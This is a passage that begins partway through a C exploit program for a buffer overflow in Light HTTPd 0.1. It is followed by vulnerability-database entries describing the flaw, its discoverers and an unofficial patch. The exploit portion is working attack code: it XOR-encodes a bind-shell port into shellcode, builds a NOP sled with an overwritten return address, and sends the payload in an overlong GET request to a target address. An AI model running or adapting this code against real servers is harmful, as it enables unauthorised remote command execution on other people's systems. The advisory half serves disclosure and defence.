shellcode[276] = (aport) & 0xff;
    shellcode[275] = (aport >> 8) & 0xff;
//xor
key = (char)99;
shellcode[275]^=key;
shellcode[276]^=key;
//set buffer
memset(buf, 0x90, sizeof(buf));
memcpy(buf+260, ret, 4);//return adress
//memset(buf+265, 0xCC, 1);//break point
//there's some kind of garbage on the stack right after the ret so the shellcode starts at 10000
memcpy(buf+1000, shellcode, sizeof(shellcode));
snprintf(sendnrecv, sizeof(sendnrecv), "GET /%s HTTP/1.0\r\n\n", buf);
printf("initialising socket\n");
s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
if (s)
{
    printf("...initialized\n");
    memset(&SockAdr, 0, sizeof(SockAdr));
    SockAdr.sin_addr.s_addr = inet_addr(argv[1]);
    SockAdr.sin_family = AF_INET;
    SockAdr.sin_port = htons(PORT);
printf("trying to connect\n");
if (!connect(s, (struct sockaddr *)&SockAdr, sizeof(SockAdr)))
{
printf("...connected\n");
      printf("(waiting)\n");
      sleep(3);
printf("sending exploit\n");
      send(s, sendnrecv, strlen(sendnrecv), 0);
printf("...sent\n");
printf("(waiting)\n");
sleep(3);
printf("...closed\nshell bound to port %s \n", argv[2]);
close(s);
    }
    else
    {
printf("... failed :( errno = %i\n", errno);
close(s);
return(0);
    }
}
}

- Vulnerability Information

14292
Light HTTPd (lhttpd) GET Request Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Uncoordinated Disclosure

- Vulnerability Description

- Timeline

2002-11-12 Unknown
2002-11-12 Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

Light HTTPD GET Request Buffer Overflow Vulnerability
Boundary Condition Error 6162
Yes No
2002-11-12 12:00:00 2009-07-11 07:16:00
Discovery of this vulnerability is credited to "dong-h0un U".

- Affected Software Versions

Light httpd Light httpd 0.1

- Vulnerability Discussion

Light httpd is prone to a remotely exploitable buffer overflow condition. This overflow can be triggered by sending the server an excessively long GET request. As Light httpd drops user privileges when running, exploitation of this issue may result in the execution of arbitrary attacker-supplied commands with the privileges of the 'nobody' user.

- Exploit

An exploit has been written by "you dong-hun" (Xpl017Elz), <szoahc@hotmail.com>.

A second exploit has been released by uid0x00 <uid0x00@hush.com>.

- Solution

An unofficial patch has been released by "dong-houn yoU" (Xpl017Elz), of INetCop Security.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.


Light httpd Light httpd 0.1

- References
